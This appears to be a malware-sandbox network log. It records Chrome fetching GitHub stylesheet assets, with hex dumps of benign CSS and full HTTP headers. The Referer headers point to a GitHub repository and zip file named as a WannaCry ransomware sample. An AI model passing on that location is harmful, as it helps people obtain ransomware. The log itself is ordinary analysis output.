                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 70 3a 76 61 72 28 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 39 36 2c 20 39 36 70 78 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 62 2d 31 30 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 76 61 72 28 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 39 36 2c 20 39 36 70 78 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6e 31 30 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 63 61 6c 63 28 2d 31 2a 76 61 72 28 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 39 36 2c 20 39 36 70 78 29 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 62 2d 6e 31 30 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 63 61 6c 63 28 2d 31 2a 76 61 72 28 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 39 36 2c 20 39 36 70 78 29 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 79 2d 31 30 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 76 61 72 28 2d 2d 62
                                                                                      Data Ascii: p:var(--base-size-96, 96px) !important}.mb-10{margin-bottom:var(--base-size-96, 96px) !important}.mt-n10{margin-top:calc(-1*var(--base-size-96, 96px)) !important}.mb-n10{margin-bottom:calc(-1*var(--base-size-96, 96px)) !important}.my-10{margin-top:var(--b
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 76 61 72 28 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 34 2c 20 34 70 78 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 76 61 72 28 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 34 2c 20 34 70 78 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 79 2d 6c 67 2d 31 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 76 61 72 28 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 34 2c 20 34 70 78 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 76 61 72 28 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 34 2c 20 34 70 78 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 2d 6c 67 2d 32 7b 6d 61 72 67 69 6e 3a 76 61 72 28 2d 2d 62 61 73 65 2d 73 69 7a 65 2d 38 2c 20 38 70 78 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6c
                                                                                      Data Ascii: {margin-right:var(--base-size-4, 4px) !important;margin-left:var(--base-size-4, 4px) !important}.my-lg-1{margin-top:var(--base-size-4, 4px) !important;margin-bottom:var(--base-size-4, 4px) !important}.m-lg-2{margin:var(--base-size-8, 8px) !important}.mt-l


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.1649708185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:21 UTC657OUTGET /assets/github-19c85be4af9c.css HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: text/css,*/*;q=0.1
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: style
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:21 UTC674INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 119130
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: text/css
                                                                                      Last-Modified: Tue, 19 Mar 2024 16:54:13 GMT
                                                                                      ETag: 0x8DC483534896A47
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:21 GMT
                                                                                      Age: 332568
                                                                                      X-Served-By: cache-iad-kiad7000120-IAD, cache-ewr18169-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 115, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 09333e4c156303884466ba272fb60afe8f2da0be
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 2e 6d 69 6e 2d 68 65 69 67 68 74 2d 66 75 6c 6c 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 68 61 6e 67 69 6e 67 2d 69 63 6f 6e 2d 6c 69 73 74 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65 7d 2e 68 61 6e 67 69 6e 67 2d 69 63 6f 6e 2d 6c 69 73 74 20 6c 69 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 34 70 78 3b 6d 61 72 67 69 6e 3a 38 70 78 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 68 61 6e 67 69 6e 67 2d 69 63 6f 6e 2d 6c 69 73 74 20 2e 6f 63 74 69 63 6f 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 32 34 70 78 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 6d 75 74 65 64 2c 20 76 61 72
                                                                                      Data Ascii: .min-height-full{min-height:100vh !important}.hanging-icon-list{list-style-type:none}.hanging-icon-list li{padding-left:24px;margin:8px 0;font-size:14px}.hanging-icon-list .octicon{float:left;margin-top:4px;margin-left:-24px;color:var(--fgColor-muted, var
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 72 43 6f 6c 6f 72 2d 61 74 74 65 6e 74 69 6f 6e 2d 65 6d 70 68 61 73 69 73 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 61 74 74 65 6e 74 69 6f 6e 2d 65 6d 70 68 61 73 69 73 29 29 7d 2e 62 72 61 6e 63 68 2d 61 63 74 69 6f 6e 2d 73 74 61 74 65 2d 75 6e 6b 6e 6f 77 6e 20 2e 62 72 61 6e 63 68 2d 61 63 74 69 6f 6e 2d 62 6f 64 79 3a 3a 61 66 74 65 72 2c 2e 62 72 61 6e 63 68 2d 61 63 74 69 6f 6e 2d 73 74 61 74 65 2d 75 6e 6b 6e 6f 77 6e 20 2e 62 72 61 6e 63 68 2d 61 63 74 69 6f 6e 2d 62 6f 64 79 3a 3a 62 65 66 6f 72 65 2c 2e 62 72 61 6e 63 68 2d 61 63 74 69 6f 6e 2d 73 74 61 74 65 2d 75 6e 73 74 61 62 6c 65 20 2e 62 72 61 6e 63 68 2d 61 63 74 69 6f 6e 2d 62 6f 64 79 3a 3a 61 66 74 65 72 2c 2e 62 72 61 6e 63 68 2d 61 63 74 69 6f 6e 2d 73 74 61 74 65 2d 75 6e 73 74
                                                                                      Data Ascii: rColor-attention-emphasis, var(--color-attention-emphasis))}.branch-action-state-unknown .branch-action-body::after,.branch-action-state-unknown .branch-action-body::before,.branch-action-state-unstable .branch-action-body::after,.branch-action-state-unst
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 65 72 2d 64 61 72 6b 2d 6d 6f 62 69 6c 65 2d 39 30 37 63 30 63 34 61 34 35 38 64 2e 73 76 67 22 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 6d 65 64 69 61 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 64 61 72 6b 29 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 31 32 70 78 29 7b 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 61 75 74 6f 5d 5b 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 2a 3d 64 61 72 6b 5d 20 2e 64 65 70 65 6e 64 61 62 6f 74 2d 72 75 6c 65 73 2d 62 61 6e 6e 65 72 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 22 2f 61 73 73 65 74 73 2f 72 75 6c 65 73 2d 70 72 6f 6d 6f 2d 62 61 6e 6e 65 72 2d 64 61 72 6b 2d 35 31 32 37 38 63 33 31 32 65 63 30 2e 73 76 67
                                                                                      Data Ascii: er-dark-mobile-907c0c4a458d.svg") !important}}@media(prefers-color-scheme: dark)and (min-width: 1012px){[data-color-mode=auto][data-dark-theme*=dark] .dependabot-rules-banner-container{background-image:url("/assets/rules-promo-banner-dark-51278c312ec0.svg
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 67 43 6f 6c 6f 72 2d 61 63 63 65 6e 74 2d 65 6d 70 68 61 73 69 73 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 61 63 63 65 6e 74 2d 65 6d 70 68 61 73 69 73 29 29 7d 2e 69 73 73 75 65 2d 6d 65 74 61 2d 73 65 63 74 69 6f 6e 20 2e 6f 63 74 69 63 6f 6e 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 6d 75 74 65 64 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 29 2c 20 23 63 63 63 29 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 6f 74 74 6f 6d 7d 2e 69 73 73 75 65 2d 6d 69 6c 65 73 74 6f 6e 65 7b 6d 61 78 2d 77 69 64 74 68 3a 32 34 30 70 78 7d 2e 69 73 73 75 65 2d 6d 69 6c 65 73 74 6f 6e 65 20 2e 63 73 73 2d 74 72 75 6e 63 61 74 65 2d 74 61 72 67 65 74 7b 6d 61 78 2d 77 69 64
                                                                                      Data Ascii: nd-color:var(--bgColor-accent-emphasis, var(--color-accent-emphasis))}.issue-meta-section .octicon{color:var(--fgColor-muted, var(--color-fg-muted), #ccc);vertical-align:bottom}.issue-milestone{max-width:240px}.issue-milestone .css-truncate-target{max-wid
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 2e 6e 65 77 73 20 64 69 76 2e 6d 65 73 73 61 67 65 2c 2e 6e 65 77 73 20 6c 69 20 62 6c 6f 63 6b 71 75 6f 74 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 6d 75 74 65 64 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 6d
                                                                                      Data Ascii: lock;max-width:390px;margin-top:2px;overflow:hidden;font-size:14px;line-height:1.3;text-overflow:ellipsis;white-space:nowrap;vertical-align:top}.news div.message,.news li blockquote{display:inline;font-size:14px;color:var(--fgColor-muted, var(--color-fg-m
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 65 74 65 2d 64 72 6f 70 64 6f 77 6e 20 5b 61 72 69 61 2d 73 65 6c 65 63 74 65 64 3d 74 72 75 65 5d 20 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 74 65 78 74 2d 71 75 61 6c 69 66 69 65 72 2c 2e 63 61 72 64 2d 66 69 6c 74 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 64 72 6f 70 64 6f 77 6e 20 2e 6e 61 76 69 67 61 74 69 6f 6e 2d 66 6f 63 75 73 20 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 74 65 78 74 2d 71 75 61 6c 69 66 69 65 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 6f 6e 45 6d 70 68 61 73 69 73 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 6f 6e 2d 65 6d 70 68 61 73 69 73 29 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 72 6f 6a 65 63 74 73 2d 72 65 73 65 74 2d 71 75 65 72 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 76 61 72 28
                                                                                      Data Ascii: ete-dropdown [aria-selected=true] .autocomplete-text-qualifier,.card-filter-autocomplete-dropdown .navigation-focus .autocomplete-text-qualifier{color:var(--fgColor-onEmphasis, var(--color-fg-on-emphasis)) !important}.projects-reset-query:hover{color:var(
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 69 6f 6e 2d 6e 65 78 74 7b 6d 61 72 67 69 6e 3a 31 36 70 78 20 30 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 62 6f 72 64 65 72 43 6f 6c 6f 72 2d 6d 75 74 65 64 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 6d 75 74 65 64 29 29 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 62 6f 72 64 65 72 43 6f 6c 6f 72 2d 6d 75 74 65 64 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 6d 75 74 65 64 29 29 7d 2e 73 65 74 75 70 2d 66 6f 72 6d 20 2e 74 6f 73 2d 69 6e 66 6f 7b 70 61 64 64 69 6e 67 3a 31 36 70 78 20 30 7d 2e 73 65 74 75 70 2d 66 6f 72 6d 20 2e 73 65 74 75 70 2d 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 2d 6e 65 78 74 7b 70 61 64 64 69 6e 67 2d 74
                                                                                      Data Ascii: ion-next{margin:16px 0;border-top:1px solid var(--borderColor-muted, var(--color-border-muted));border-bottom:1px solid var(--borderColor-muted, var(--color-border-muted))}.setup-form .tos-info{padding:16px 0}.setup-form .setup-organization-next{padding-t
                                                                                      2024-03-23 14:47:21 UTC4442INData Raw: 65 6d 62 65 72 2d 73 75 67 67 65 73 74 69 6f 6e 20 2e 6d 65 6d 62 65 72 2d 73 75 67 67 65 73 74 69 6f 6e 2d 69 6e 66 6f 7b 77 69 64 74 68 3a 39 30 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 6d 65 6d 62 65 72 2d 73 75 67 67 65 73 74 69 6f 6e 20 2e 6d 65 6d 62 65 72 2d 6e 61 6d 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 6d 75 74 65 64 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 29 29 7d 2e 6d 65 6d 62 65 72 2d 73 75 67 67 65 73 74 69 6f 6e
                                                                                      Data Ascii: ember-suggestion .member-suggestion-info{width:90%;margin-top:2px;margin-bottom:0;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.member-suggestion .member-name{font-size:12px;color:var(--fgColor-muted, var(--color-fg-muted))}.member-suggestion


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.1649710185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:21 UTC661OUTGET /assets/repository-6247ca238fd4.css HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: text/css,*/*;q=0.1
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: style
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:21 UTC673INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 28561
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: text/css
                                                                                      Last-Modified: Tue, 20 Feb 2024 19:01:12 GMT
                                                                                      ETag: 0x8DC32464EB087C6
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:21 GMT
                                                                                      Age: 2736779
                                                                                      X-Served-By: cache-iad-kcgs7200156-IAD, cache-lga21957-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 40, 2
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 69d0bcadd91bbe9b9c831fc260789c7bb803134e
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 2e 4d 61 74 72 69 78 43 6f 6d 70 6f 6e 65 6e 74 2d 70 65 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 3a 31 32 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 65 61 73 65 2d 6f 75 74 20 2e 31 32 73 7d 2e 4d 61 74 72 69 78 43 6f 6d 70 6f 6e 65 6e 74 2d 63 6f 6c 6c 61 70 73 65 2d 2d 74 69 74 6c 65 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 7d 2e 54 61 67 73 65 61 72 63 68 50 6f 70 6f 76 65 72 2d 6c 69 73 74 20 2e 54 61 67 73 65 61 72 63 68 50 6f 70 6f 76 65 72 2d 6c 69 73 74 2d 69 74 65 6d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 67 43 6f 6c 6f 72 2d 6d 75 74 65 64 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 63 61 6e 76 61 73 2d 73 75 62 74 6c 65 29 29 7d 2e 54 61 67 73 65 61 72 63 68 50
                                                                                      Data Ascii: .MatrixComponent-pending{padding:12px;transition:opacity ease-out .12s}.MatrixComponent-collapse--title{line-height:20px}.TagsearchPopover-list .TagsearchPopover-list-item:hover{background-color:var(--bgColor-muted, var(--color-canvas-subtle))}.TagsearchP
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 63 61 70 70 65 64 2d 6c 69 73 74 20 74 64 2e 6d 69 64 64 6c 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 74 61 62 6c 65 2e 63 61 70 70 65 64 2d 6c 69 73 74 20 2e 66 61 76 69 63 6f 6e 7b 77 69 64 74 68 3a 31 36 70 78 3b 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 61 72 67 69 6e 3a 30 20 34 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 74 61 62 6c 65 2e 63 61 70 70 65 64 2d 6c 69 73 74 20 2e 6f 63 74 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 6d 75 74 65 64 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 29 29 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 2d 33 70 78 7d 74 61 62 6c 65 2e 63 61 70 70 65 64 2d 6c 69 73
                                                                                      Data Ascii: capped-list td.middle{text-align:center}table.capped-list .favicon{width:16px;height:16px;margin:0 4px;vertical-align:middle}table.capped-list .octicon{margin-right:8px;color:var(--fgColor-muted, var(--color-fg-muted));vertical-align:-3px}table.capped-lis
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 61 63 74 6f 72 2d 6c 69 6d 69 74 2d 72 65 61 63 68 65 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 34 34 30 70 78 7d 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 73 75 67 67 65 73 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 73 75 67 67 65 73 74 69 6f 6e 2d 69 73 73 75 65 2d 6e 75 6d 62 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 6d 75 74 65 64 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 29 29 7d 2e 61 75 74 6f 6d 61 74 65 64 2d 63 68 65 63 6b 2d 6f 70 74 69 6f 6e 73 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 7d 2e 61 75 74 6f 6d 61 74 65 64 2d 63 68 65 63 6b 2d 6f 70
                                                                                      Data Ascii: actor-limit-reached{display:block;width:440px}.autocomplete-suggestion{display:inline-block}.autocomplete-suggestion-issue-number{margin-left:3px;color:var(--fgColor-muted, var(--color-fg-muted))}.automated-check-options{margin-top:8px}.automated-check-op
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 78 2d 73 68 72 69 6e 6b 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 7d 2e 68 78 5f 6d 65 72 67 65 5f 71 75 65 75 65 5f 65 6e 74 72 79 5f 73 74 61 74 75 73 5f 69 63 6f 6e 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 70 75 6c 6c 2d 64 69 73 63 75 73 73 69 6f 6e 2d 74 69 6d 65 6c 69 6e 65 2e 69 73 2d 70 75 6c 6c 2d 72 65 73 74 6f 72 61 62 6c 65 20 2e 70 75 6c 6c 2d 72 65 71 75 65 73 74 2d 72 65 66 2d 72 65 73 74 6f 72 65 2e 6c 61 73 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 6e 65 77 73 2d 66 75 6c 6c 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 70 72 6f 74 65 63 74 65 64 2d 62 72 61 6e 63 68 2d 61 64 6d
                                                                                      Data Ascii: x-shrink:0;max-width:none}.hx_merge_queue_entry_status_icon{fill:none;background-color:transparent;border:none}.pull-discussion-timeline.is-pull-restorable .pull-request-ref-restore.last{display:block}.news-full{float:none;width:auto}.protected-branch-adm
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 65 72 2c 2e 62 72 61 6e 63 68 2d 61 63 74 69 6f 6e 2d 73 74 61 74 65 2d 63 6c 65 61 6e 20 2e 62 72 61 6e 63 68 2d 61 63 74 69 6f 6e 2d 62 6f 64 79 3a 3a 62 65 66 6f 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 31 70 78 3b 72 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 2d 38 70 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 38 70 78 3b 68 65 69 67 68 74 3a 31 36 70 78 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 63 6f 6e 74 65 6e 74 3a 22 20 22 3b 63 6c 69 70 2d 70 61 74 68 3a 70 6f 6c 79 67 6f 6e 28 30 20 35 30 25 2c 20 31 30 30 25 20 30 2c 20 31 30 30 25 20 31 30 30 25 29 7d 2e 62 72 61 6e 63 68 2d 61 63 74 69 6f 6e 2d 73 74 61 74 65 2d 63 6c 65 61 6e 20 2e 62 72 61 6e 63 68 2d 61 63
                                                                                      Data Ascii: er,.branch-action-state-clean .branch-action-body::before{position:absolute;top:11px;right:100%;left:-8px;display:block;width:8px;height:16px;pointer-events:none;content:" ";clip-path:polygon(0 50%, 100% 0, 100% 100%)}.branch-action-state-clean .branch-ac
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 31 70 78 3b 72 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 2d 38 70 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 38 70 78 3b 68 65 69 67 68 74 3a 31 36 70 78 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 63 6f 6e 74 65 6e 74 3a 22 20 22 3b 63 6c 69 70 2d 70 61 74 68 3a 70 6f 6c 79 67 6f 6e 28 30 20 35 30 25 2c 20 31 30 30 25 20 30 2c 20 31 30 30 25 20 31 30 30 25 29 7d 2e 62 72 61 6e 63 68 2d 61 63 74 69 6f 6e 2d 73 74 61 74 65 2d 65 72 72 6f 72 20 2e 62 72 61 6e 63 68 2d 61 63 74 69 6f 6e 2d 62 6f 64 79 3a 3a 61 66 74 65 72 2c 2e 69 73 2d 6d 65 72 67 69 6e 67 20 2e 62 72 61 6e 63 68 2d 61 63 74 69 6f 6e 2d 73 74 61 74 65 2d 65 72 72 6f 72 2d 69 66 2d 6d 65
                                                                                      Data Ascii: ition:absolute;top:11px;right:100%;left:-8px;display:block;width:8px;height:16px;pointer-events:none;content:" ";clip-path:polygon(0 50%, 100% 0, 100% 100%)}.branch-action-state-error .branch-action-body::after,.is-merging .branch-action-state-error-if-me
